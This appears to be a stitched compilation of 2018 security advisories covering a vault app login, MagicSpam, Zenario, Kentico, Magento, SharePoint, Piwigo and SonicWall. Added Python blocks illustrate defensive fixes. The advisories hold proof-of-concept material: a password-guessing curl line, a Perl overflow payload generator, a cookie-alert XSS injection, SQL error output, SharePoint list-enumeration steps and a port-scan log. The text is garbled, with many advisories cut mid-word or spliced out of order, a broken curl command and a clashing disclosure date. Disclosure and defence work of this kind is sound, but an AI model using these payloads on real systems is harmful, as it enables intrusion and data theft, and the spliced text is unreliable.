Taken together, these two problems pose a significant risk to users and individuals, based on sensitive information stored in the vault of the mobile iOS application. The security risk of the insecure authentication configuration vulnerability is estimated as medium with a cvss count of 4.8. Exploitation of the vulnerability requires network access to connect to the web-server via wifi without user interaction. Successful exploitation of the vulnerability results in unauthorized access to private vault data or sensitive information. Proof of Concept (PoC): === The security issue can be exploited by remote attackers without privileged user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. PoC: http_code=$(curl -L -data password="passwdords.txt" "$url http://Localhost:9900/login.html__; -w '%{http_code}' -o /root/fuzztime -s) #forensic --- PoC Session Logs [GET] --- GET http://localhost:9900/login.html Host: Localhost:9900 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://Localhost:9900/ Connection: keep-alive Upgrade-Insecure-Requests: 1 Date: Sat, 06 Jan 2018 15:06:20 GMT Accept-Ranges: bytes Transfer-Encoding: chunked Note: Requests first the login page - GET http://localhost:9900/login.html__passwd1 Host: Localhost:9900 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost:9900/login.html Connection: keep-alive Upgrade-Insecure-Requests: 1 Date: Sat, 06 Jan 2018 15:06:26 GMT Accept-Ranges: bytes Transfer-Encoding: chunked Note: Access to vault of ios mobile application was 
cracked in a forensic access test within 15 minutes. Reference(s): http://localhost:9900/ http://localhost:9900/login.html http://localhost:9900/login.html__ Security Risk: == The security risk of the vulnerability in the mobile vault application is eastimated as medium (CVSS 4.8). Credits & Authors: == Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerabili
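The two weaknesses the advisory names (no request limitation, a plain password compare on the login path) are contrasted below with a throttled, salted-hash check. This is an added illustration and not the Photo Vault app's own code; the class names, limits, client addresses and wordlist are constructed for the demonstration.

```python
"""Throttled, constant-time login check for a small embedded http server.

Added example for the advisory above, not the Photo Vault app's own code.
It models the two problems the advisory describes (no request limitation,
plain password compare) beside a check with a per-client failure window.
All names, limits and sample values here are constructed for illustration.
"""
import hashlib
import hmac
import os
import time
from collections import deque


class NaiveVaultLogin:
    """Unthrottled plain compare: every request gets a fresh guess."""

    def __init__(self, password):
        self._password = password

    def attempt(self, client, candidate):
        # The client address is ignored: nothing is counted or limited.
        return "ok" if candidate == self._password else "denied"


class ThrottledVaultLogin:
    """Salted PBKDF2 hash, constant-time compare and a per-client lockout."""

    MAX_FAILURES = 5      # failures allowed inside WINDOW_S before lockout
    WINDOW_S = 60.0       # sliding window for counting failures
    LOCKOUT_S = 300.0     # how long a locked client stays locked

    def __init__(self, password, clock=time.monotonic):
        self._salt = os.urandom(16)
        self._digest = self._hash(password)
        self._clock = clock                 # injectable for deterministic tests
        self._failures = {}                 # client -> deque of failure times
        self._locked_until = {}             # client -> monotonic deadline

    def _hash(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                   self._salt, 100_000)

    def attempt(self, client, candidate):
        now = self._clock()
        if self._locked_until.get(client, 0.0) > now:
            return "locked"                 # even a correct guess is refused
        # compare_digest keeps the compare time independent of where the
        # candidate first differs from the stored digest
        if hmac.compare_digest(self._hash(candidate), self._digest):
            self._failures.pop(client, None)
            return "ok"
        window = self._failures.setdefault(client, deque())
        window.append(now)
        while window and now - window[0] > self.WINDOW_S:
            window.popleft()
        if len(window) >= self.MAX_FAILURES:
            self._locked_until[client] = now + self.LOCKOUT_S
            window.clear()
            return "locked"
        return "denied"


def run_guess_loop(login, client, candidates):
    """Feed candidates to a login until it answers 'ok' or 'locked'.

    Returns (outcome, guesses_made); 'denied' means the list was exhausted.
    """
    for made, candidate in enumerate(candidates, 1):
        outcome = login.attempt(client, candidate)
        if outcome in ("ok", "locked"):
            return outcome, made
    return "denied", len(candidates)


if __name__ == "__main__":
    # Constructed wordlist: 20 wrong guesses followed by the real password.
    wordlist = ["guess%02d" % i for i in range(20)] + ["s3cret-vault"]
    print("naive:    ", run_guess_loop(NaiveVaultLogin("s3cret-vault"),
                                        "192.0.2.10", wordlist))
    print("throttled:", run_guess_loop(ThrottledVaultLogin("s3cret-vault"),
                                        "192.0.2.10", wordlist))
```

The unthrottled login answers every guess until the right one arrives; the throttled one stops answering after five failures and refuses even the correct password until the lockout expires.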
MagicSpam 2.0.13 - Insecure File Permission Vulnerability
Document Title:
===============
MagicSpam 2.0.13 - Insecure File Permission Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2113

Release Date:
=============
2018-01-12

Vulnerability Laboratory ID (VL-ID):
====================================
2113

Common Vulnerability Scoring System:
====================================
2.8

Vulnerability Class:
====================
Privacy Violation - Information Disclosure

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
MagicSpam comes fully-integrated with any Plesk 12+ package, blocking spam at the edge before it gets a chance to be filtered. There's no need to change DNS or MX records. And your protection comes ready to go with complete logging, statistics, and custom controls.

(Copy of the Homepage: https://www.plesk.com/extensions/magicspam/ )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an insecure file permission vulnerability in the MagicSpam 2.0.13-1 plesk extension.

Vulnerability Disclosure Timeline:
==================================
2017-01-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
LinuxMagic
Product: MagicSpam - Plesk Extension 2.0.13-1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Low

Technical Details & Description:
================================
An insecure file permission access vulnerability has been discovered in the MagicSpam 2.0.13-1 plesk extension. The vulnerability allows an attacker to access sensitive information like email addresses without permission or authentication.

The Plesk panel features the freemium extension MagicSpam, which provides industry-leading spam protection technologies. MagicSpam keeps a detailed log of all e-mail messages processed under the directory /var/log/magicspam/ in Ubuntu installations. A log file is created with the name mslog, with read permissions for everyone, and rotated daily. The file reveals the full list of mailboxes on the server (provided they received or sent at least one message in the past).

The security risk of the permission vulnerability is estimated as low with a common vulnerability scoring system count of 2.8. Successful exploitation of the file permission security vulnerability results in information disclosure of email addresses.

Proof of Concept (PoC):
=======================
The insecure file permission vulnerability can be exploited by remote attackers without a user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

$ id
uid=1002(marco) gid=1011(marco) groups=1011(marco)
$ cd /var/log/magicspam/
$ ls -l
-rw-r--r-- 1 magicspam root 348937 Jan 10 11:50 mslog
$ tail -n1 mslog
2018-01-10 11:51:26 magicspam-daemon[335]: HAM: mua=no,ip=[93.94.32.17:mail15.clab99a.contactlab.it],helo=,from=<564020151.35960.1000...@t.contactlab.it>,rcpt=<i...@thenetworksolution.it>

Solution - Fix & Patch:
=======================
The security vulnerability can be resolved by excluding the email addresses from the affected application log files. Another solution could be to integrate an authentication mechanism for the log file of the MagicSpam web-application.

Security Risk:
==============
The security risk of the insecure file permission vulnerability in the plesk extension magic spam is estimated as medium (CVSS 2.8).

Credits & Authors:
==================
Marco Marsala [ma...@thenetworksolution.it] - https://www.vulnerability-lab.com/show.php?user=Marco+Marsala
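The two fixes the advisory proposes (keep mailbox addresses out of the log, and stop exposing the log to every local user) can both be checked and applied from a short script. The block below is an added example, not LinuxMagic's or Plesk's own code; the directory it creates, the file names and the sample log line are constructed for the demonstration.

```python
"""Permission audit and mailbox redaction for a world-readable mail log.

Added example for the MagicSpam advisory above; not LinuxMagic's or Plesk's
own code. It checks a log directory for files readable by 'other' (the
0644 mslog shown in the PoC, plus daily rotated copies) and strips the
local part of mailbox addresses from log lines, the advisory's first fix.
The temp directory and the sample line below are constructed.
"""
import os
import re
import stat
import tempfile

# from=<user@host> / rcpt=<user@host>; the local part is the mailbox name.
_ADDR_RE = re.compile(r"(from|rcpt)=<([^@>]+)@([^>]+)>")


def redact_mailboxes(line):
    """Replace the local part of from=/rcpt= addresses, keeping the domain.

    Empty envelope senders (from=<>) carry no mailbox and are left alone.
    """
    return _ADDR_RE.sub(r"\1=<***@\3>", line)


def world_readable(path):
    """True when the 'other' read bit is set on path."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_log_dir(dirpath, basename="mslog"):
    """Return sorted names of mslog and its rotated copies readable by other."""
    found = []
    for name in os.listdir(dirpath):
        if name == basename or name.startswith(basename + "."):
            if world_readable(os.path.join(dirpath, name)):
                found.append(name)
    return sorted(found)


def harden_log_dir(dirpath, basename="mslog", mode=0o640):
    """Drop the 'other' bits on every world-readable mslog* file.

    Returns the names that were changed.
    """
    changed = []
    for name in audit_log_dir(dirpath, basename):
        os.chmod(os.path.join(dirpath, name), mode)
        changed.append(name)
    return changed


def make_demo_dir():
    """Create a temp dir mirroring the PoC listing (constructed files)."""
    d = tempfile.mkdtemp(prefix="magicspam-demo-")
    for name, mode in (("mslog", 0o644), ("mslog.1", 0o644),
                       ("mslog.2.gz", 0o640), ("other.log", 0o644)):
        p = os.path.join(d, name)
        with open(p, "w") as fh:
            fh.write("")
        os.chmod(p, mode)
    return d


# Constructed line in the mslog format shown in the PoC.
SAMPLE_LINE = ("2018-01-10 11:51:26 magicspam-daemon[335]: HAM: mua=no,"
               "ip=[198.51.100.7:mx.example.com],helo=,"
               "from=<alice@example.org>,rcpt=<bob@example.net>")

if __name__ == "__main__":
    demo = make_demo_dir()
    print("world-readable before:", audit_log_dir(demo))
    print("changed:", harden_log_dir(demo))
    print("world-readable after: ", audit_log_dir(demo))
    print(redact_mailboxes(SAMPLE_LINE))
```

Only mslog and its rotated siblings are touched; the unrelated other.log in the demo directory is reported neither before nor after.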
Zenario v7.6 CMS - SQL Injection Web Vulnerability
1ExIotzyCRzQ%3D%3D%22%2C%22session%22%3Afalse%7D%7D]
Response Header:
Server[Apache/2.4.23 (Ubuntu)]
X-Frame-Options[SAMEORIGIN]
Content-Length[1862]
Connection[Keep-Alive]
Content-Type[text/html; charset=UTF-8]

Reference(s):
http://zenario.localhost:8080/
http://zenario.localhost:8080/zenario/
http://zenario.localhost:8080/zenario/admin/
http://zenario.localhost:8080/zenario/admin/admin_boxes.ajax.php

Solution - Fix & Patch:
=======================
1. Escape the content of the name input field
2. Sanitize the current_value parameter
3. Disallow the usage of special chars in the current_value parameter
4. Use a prepared statement to prevent further exploitation

Security Risk:
==============
The security risk of the remote sql-injection web vulnerability in the web-application is estimated as medium (cvss 5.7).

Credits & Authors:
==================
Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability
d the xml config file to overwrite the ecx and eip registers. The installation path and the iis website values are not exploitable, because the active content restrictions of the process raise an invalid argument exception that prevents it.

PoC: Exploit Code (XML)

PoC: Exploitation (Perl)
#!/usr/bin/perl
# writes 3000 "A" bytes into the payload file used for the import test
my $Buff = "A" x 3000;
open(MYFILE,'>>kentico_unicode_payload.txt');
print MYFILE $Buff;
close(MYFILE);
print "PoC (c) Vulnerability-Laboratory";

--- PoC Debug Session Logs [WinDBG] ---
(1522.21ec): Stack buffer overflow - code c409
eax= ebx=0044b208 ecx=00410041 edx=513cc7c2 esi=003a22d0 edi=00477cd0
eip=41004100 esp= ebp= iopl=0 nv up ei pl nz na po nc
cs=001c ss=0022 ds=0022 es=0022 fs=002c gs= efl=
41414141 cc22 -
EXCEPTION_RECORD: -- (.exr )
ExceptionAddress: 41414141
ExceptionCode: c409 (Stack Buffer Overflow)
ExceptionFlags: 0001
NumberParameters: 1
Parameter[0]: 0002

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure file size and input character restriction, like the one on the iis scheme website input. Parse the full xml file on import and restrict the memory size of imports to prevent further buffer overflow attacks.

Security Risk:
==============
The security risk of the local stack buffer overflow vulnerability in the kentico cms software is estimated as high. (CVSS 6.0)

Credits & Authors:
==================
Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Magento Commerce - SSRF & XSPA Web Vulnerability
Document Title:
===============
Magento Commerce - SSRF & XSPA Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1631

Release Date:
=============
2018-01-03

Vulnerability Laboratory ID (VL-ID):
====================================
1631

Common Vulnerability Scoring System:
====================================
4.7

Vulnerability Class:
====================
Server Side Request Forgery

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What's equally important to protecting this data? Our security researchers and user community. If you find a site that isn't following our policies, or a vulnerability inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security & http://magento.com/security )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an SSRF/XSPA vulnerability in the official Magento Commerce online service web-application.

Vulnerability Disclosure Timeline:
==================================
2018-01-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Magento - Web Application Service 2015 Q4

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An SSRF/XSPA vulnerability has been discovered in the official Magento Commerce online service web-application. The vulnerability allows remote attackers to perform malicious server-side requests to compromise the computer system or to gain unauthorized access to data or sensitive information.

The XSPA & SSRF issue allows the processing functionality of the magento engine to be used as a port scanner for the local host or any remote machine in the same network. The issue is the first documented xspa and ssrf issue in the magento service web-applications.

The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.7. Exploitation of the ssrf/xspa vulnerability requires a privileged web-application user account and no user interaction. Successful exploitation of the issue can result in web-server or web-application compromise or unauthorized malicious interactions.

Proof of Concept (PoC):
=======================
Remote attackers are able to perform a local scan through the protected web-server firewall against magento.com and magentocommerce.com. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open http://magento.com/security-patch (Magento Shoplift Bug Tester)
2. Write www.magento.com:22 into the website input
3. Click to bug scan for the port 22
4. Successful reproduce of the issue!

--- Scan Log NMAP ---
Starting Nmap 6.00 at 2016-08-15 15:10 EEST
Initiating Ping Scan at 15:10
Scanning magento.com (66.211.190.110) [4 ports]
Completed Ping Scan at 15:10, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:10
Scanning magento.com (66.211.190.110) [100 ports]
Discovered open port 80/tcp on 66.211.190.110
Discovered open port 443/tcp on 66.211.190.110
Discovered open port 8443/tcp on 66.211.190.110
Discovered open port 8080/tcp on 66.211.190.110
Completed SYN Stealth Scan at 15:10, 2.38s elapsed (100 total ports)
......

Note: SSRF/XSPA allows scanning the local host to discover the open service ports (References: https://cwe.mitre.org/data/definitions/918.html)

Solution - Fix & Patch:
=======================
The vulnerability has been resolved as a bug bounty issue by the magento security team in 2017.

Security Risk:
==============
The security risk of the ssrf/xspa web vulnerability that allows scanning the infrastructure behind the firewall is estimated as medium (CVSS 4.7).

Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] (resea...@vulnerability-lab.com) [www.vulnerability-lab.com]
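The root cause in the steps above is a server-side checker that fetches whatever host:port the form submits. The block below is an added example of the target validation such a checker needs, not Magento's own code: it rejects non-http(s) schemes, any port other than 80/443 (so www.magento.com:22 is refused) and any hostname whose resolved addresses are loopback, private, link-local or otherwise non-public. The resolver is injectable; the fake DNS table and its addresses are constructed for the offline demonstration.

```python
"""Target validation for a server-side URL/host checker (SSRF/XSPA guard).

Added example for the advisory above; not Magento's own code. A bug tester
that fetches a user-supplied site must not become a port scanner, so the
check below refuses anything but http/https on the default ports and any
host that resolves to a loopback, private, link-local or otherwise
non-public address. FAKE_DNS and its addresses are constructed.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


class TargetRejected(ValueError):
    """Raised with a short reason when a target must not be fetched."""


def resolve_all(host):
    """All A/AAAA answers for host via the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_public(ip):
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_target(raw, resolver=resolve_all):
    """Return (scheme, host, port, addresses) for an acceptable target.

    Accepts the bare "www.example.com" form a web form would submit as well
    as a full URL. Every resolved address is checked, not just the first,
    and the caller should connect to one of the returned addresses rather
    than resolving again (closes the DNS-rebinding window).
    """
    raw = raw.strip()
    url = raw if "://" in raw else "http://" + raw
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise TargetRejected("scheme %r not allowed" % parts.scheme)
    if parts.username is not None or parts.password is not None:
        raise TargetRejected("credentials in URL")
    host = parts.hostname
    if not host:
        raise TargetRejected("missing host")
    try:
        port = parts.port
    except ValueError:
        raise TargetRejected("malformed port")
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        raise TargetRejected("port %d not allowed" % port)
    addresses = resolver(host)
    if not addresses:
        raise TargetRejected("host does not resolve")
    for addr in addresses:
        if not _is_public(ipaddress.ip_address(addr)):
            raise TargetRejected("%s resolves to non-public %s" % (host, addr))
    return parts.scheme, host, port, addresses


def is_allowed(raw, resolver=resolve_all):
    """Boolean wrapper around validate_target."""
    try:
        validate_target(raw, resolver)
        return True
    except TargetRejected:
        return False


# Constructed answers so the demonstration runs offline.
FAKE_DNS = {
    "www.magento.com": ["66.211.190.110"],
    "intranet.local": ["10.0.0.5"],
    "localhost": ["127.0.0.1"],
    "::1": ["::1"],
    "dual.example": ["66.211.190.110", "192.168.1.20"],
}


def fake_resolver(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for target in ("www.magento.com", "www.magento.com:22",
                   "https://www.magento.com/", "http://intranet.local/",
                   "http://[::1]:80/", "http://dual.example/"):
        print("%-28s %s" % (target, is_allowed(target, fake_resolver)))
```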
SonicWall GMS v8.1 - Filter Bypass & Persistent Vulnerability
date or by manual interaction to prevent attacks.

Security Risk:
==============
The security risk of the persistent input validation vulnerability and filter bypass issue is estimated as medium. (CVSS 4.1)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] [www.vulnerability-lab.com]
Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability
Document Title:
===============
Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2111

Release Date:
=============
2018-01-07

Vulnerability Laboratory ID (VL-ID):
====================================
2111

Common Vulnerability Scoring System:
====================================
4.8

Vulnerability Class:
====================
Filter or Protection Mechanism Bypass

Current Estimated Price:
========================
1.000€ - 2.000€

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a permission bypass vulnerability in the Microsoft Sharepoint online service web-application.

Vulnerability Disclosure Timeline:
==================================
2018-01-07: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Microsoft Corporation
Product: Sharepoint Online Service - (Web-Application) 2013

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A permission level bypass web vulnerability has been identified in the microsoft sharepoint 2013 online service web-application, and maybe in prior versions. The security vulnerability allows attackers to open or view restricted items in the site or library. An authenticated user can bypass `Limited Access` permissions to browse a page or library and access a specific content item that was restricted.

Proof of Concept (PoC):
=======================
POC 1:
1. Search for specific words inside the web & mobile sharepoint search box: `password` `pass` `user` `domainuser` `name | lastname` ...
   [~] web search: http://site/BSearch/results.aspx
   [~] mobile search: http://site/_layouts/mobile/MobileResults.aspx
   example : http://site/BSearch/results.aspx?k=password
   example : http://site/BSearch/results.aspx?k="NSA1377;
   example : http://site/_layouts/mobile/MobileResults.aspx?k=pass
   example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB
2. The page shows some of sharepoint's search results, like restricted specific item, site and library urls etc.
3. So click on the urls to access|view|read the site page and other restricted libraries and items

POC 2:
After capturing packets between our system and the sharepoint site (use fiddler or burpsuite, wireshark ...) we have access to item, list, page and site urls like the following:
http://site/IT/Lists/List70/AllItems.aspx
Access to restricted items & lists by making /LIST#/ urls
Example:
http://site/IT/Lists/List100/AllItems.aspx
http://site/IT/Lists/List101/AllItems.aspx
http://site/IT/Lists/List102/AllItems.aspx

Security Risk:
==============
The security risk of the bypass vulnerability in the microsoft sharepoint 2013 application is estimated as medium (CVSS 4.8).

Credits & Authors:
==================
Behnam Vanda [beni.va...@gmail.com] [redhathackers] - https://www.vulnerability-lab.com/show.php?user=Behnam+Vanda
Magento Connect T1 - (Claim) Persistent Vulnerability
.magentocommerce.com/magento-connect/claim/claim/new/]
Cookie X-Forwarded-For[8.8.8.8]
Connection[keep-alive]
Post Data:
claim%5Bclaimed_extension_url%5D[%22%3E%3Ciframe+src%3D%22javascript%3Aalert%28document.cookie%29%22%3E%3C%2Fiframe%3E]
claim%5Boriginal_extension_url%5D[]
claim%5Bdescription%5D[]
claim%5Bdigital_signature%5D[]
Response Headers:
Server[nginx]
Content-Type[text/html; charset=UTF-8]
Connection[keep-alive]
P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Set-Cookie[frontend=4edl2ftb4c6qoe11lieojciaj7; path=/magento-connect/; domain=www.magentocommerce.com]
Content-Length[71413]

Solution - Fix & Patch:
=======================
The security vulnerability is marked as fixed within 2017 Q1 - 2017 Q4 by the magento developer team.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated as medium (CVSS 3.8).

Credits & Authors:
==================
Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Piwigo v2.8.2 & 2.9.2 CMS - Multiple Cross Site Vulnerabilities
EXECUTION!]>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/x/public_html/x/piwigo/admin/languages.php on line 48
http://www.w3.org/TR/html4/strict.dtd;> Just another Piwigo gallery :: Piwigo Administration

Vulnerable Source: to (form)
<[MALICIOUS PAYLOAD EXECUTION!]> "> Update in progress... <<><[MALICIOUS PAYLOAD EXECUTION!]> ">

Vulnerable Source: installstatus (error exception)
Plugins list Check for updates Other plugins available
An error occured during the files (<[MALICIOUS PAYLOAD EXECUTION!]>) extraction. Please check "plugins" folder and sub-folders permissions (CHMOD).

Reference(s):
http://piwigo.localhost:8080/
http://piwigo.localhost:8080/piwigo/
http://piwigo.localhost:8080/piwigo/admin.php

Solution - Fix & Patch:
===
The XSS web vulnerabilities can be patched by a secure restriction of the parameter inputs in GET method requests. Sanitize the vulnerable parameters and disallow the usage of special chars to prevent further script code injection attacks. Parse the output locations in the status messages and the exception to resolve the client-side vulnerabilities. Escape the contents to deliver them in a secure format.

Security Risk:
===
The security risk of the client-side cross site scripting web vulnerabilities in the content management system is estimated as medium (CVSS 3.4).

Credits & Authors:
===
Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Flash Operator Panel v2.31.03 - Command Execution Vulnerability
and parameter in the index.php file GET method request. Sanitize the command path variable and disallow the usage of special chars to prevent further command injection attacks.

Security Risk:
===
The security risk of the command injection vulnerability via path variable in the web-application is estimated as high (CVSS 6.2).

Credits & Authors:
===
Benjamin K.M. [b...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Wickr Inc - App Clock & Message Deletion Glitch - Bug Bounty
Wickr Inc - App Clock & Message Deletion Glitch P2 - Bug Bounty (Document) [PDF]
URL: https://www.vulnerability-lab.com/get_content.php?id=2107

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/01/04/wickr-inc-app-clock-message-deletion-glitch
WpJobBoard v4.4.4 - Multiple SQL Injection Vulnerabilities
the right syntax to use near ''' at line 1
- Fatal error: Uncaught exception 'wp_wpjb_job' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Reference(s):
https://wp-jobboard.localhost:8080/
https://wp-jobboard.localhost:8080/wp-admin/
https://wp-jobboard.localhost:8080/wp-admin/admin.php
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-alerts=index=all=
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-job=index=1=job_expires_at=

Solution - Fix & Patch:
===
The vulnerability can be patched by a restriction of the vulnerable sort and order parameters in the web-application GET method request. Disallow the usage of special chars to prevent malicious inputs and use a prepared statement to resolve the SQL injection vulnerability. Disable the display of errors in the default configuration and include exception handling to cover further malicious attacks.

Note: The SQL injections have been prevented from version 4.9.1 up to the latest released version 5.1 of the wpjobboard WordPress web-application plugin.

Security Risk:
===
The security risk of the remote SQL injection web vulnerabilities in the wpjobboard web-application is estimated as high (CVSS 6.0).

Credits & Authors:
===
Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities
dapUsrGrpMbrAttr[member] ldapUsrGrpMbrType[0] ldapUsrGrpOtherMatchAttr[primaryGroupToken] cbox_ldapUsrUseOtherGrpAttr[] ldapUsrDomain[sjcolo.local] usrTreesSel[MALICIOUS PAYLOAD INJECT!] ldapTreesAutoConfDomain[] ldapAllowReferrals_0[on] ldapAllowReferrals_1[on] ldapAllowReferrals_2[on] ldapAllowReferrals_3[on] cbox_ldapAllowReferrals_0[] cbox_ldapAllowReferrals_1[] cbox_ldapAllowReferrals_2[] cbox_ldapAllowReferrals_3[] userRadiusCheckLocal[on] userRadiusUserGrpsLocal[on] selDfltUserGroup[2] ldapUsrGrpMirroring[on] ldapUsrGrpMirrorPeriod[x] ldapUsrGrpMirrorWhat[0] cbox_userRadiusCheckLocal[] cbox_userRadiusUserGrpsLocal[] cbox_ldapUsrGrpMirroring[] ldapRelayEnable[on] ldapRelayOnLAN[on] ldapRelayOnWAN[on] ldapRelayOnVPN[on] ldapRelaySecret[] ldapRelayLegacyVpnUsrGrp[] ldapRelayLegacyVpnClientGrp[] ldapRelayLegacyL2TPUsrGrp[] ldapRelayLegacyInetUsrGrp[] ldapRelayHashSecret[] cbox_ldapRelayEnable[] cbox_ldapRelayOnLAN[] cbox_ldapRelayOnWAN[] cbox_ldapRelayOnDMZ[] cbox_ldapRelayOnWLAN[] cbox_ldapRelayOnVPN[] Radius_user[] Radius_passwd[] remAuthTstProtocol[0] TestInfo[] remAuthTstType[-1] rNum[28F5903AD031CF055855192B2F30CC6E] testType[1] testDesc[LDAP+server] ldapUsrsTree_1[MALICIOUS PAYLOAD INJECT!]
Response Header:
Server[localhost] Expires[-1] Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[unknown]
Request Header:
Host[utm_waf.localhost:8512] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://utm_waf.localhost:8512/ssoAuthProps.html] Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=0; 7510=0]

--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://utm_waf.localhost:8512/main.cgi
Mime Type[text/html]
Request Header:
Host[utm_waf.localhost:8512] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://utm_waf.localhost:8512/addServiceObjDlg.html] Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=2; 7510=0] Connection[keep-alive]
POST-Daten:
csrfToken[] svcObjId_-1[MALICIOUS INJECTED PAYLOAD!] svcObjType_-1[1] svcObjProperties_-1[4878] svcObjIpType_-1[ssh] svcObjPort1_-1[1] svcObjPort2_-1[1] svcObjManagement_-1[0] svcObjHigherPrecedence_-1[0]
Response Header:
Server[localhost] Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[text/html]
Request Header:
Host[utm_waf.localhost:8512] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0] Referer[https://utm_waf.sonicwall:8512/ssoAuthProps.html] Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 777=3; 7510=0] Connection[keep-alive]
Response Header:
Server[SonicWALL] Content-Type[text/html;charset=UTF-8]

Reference(s):
https://utm_waf.sonicwall:8512/
https://utm_waf.localhost:8512/main.cgi
https://utm_waf.localhost:8512/ldapProps.html
https://utm_waf.sonicwall:8512/ssoAuthProps.html
https://utm_waf.localhost:8512/addServiceObjDlg.html

Solution - Fix & Patch:
===
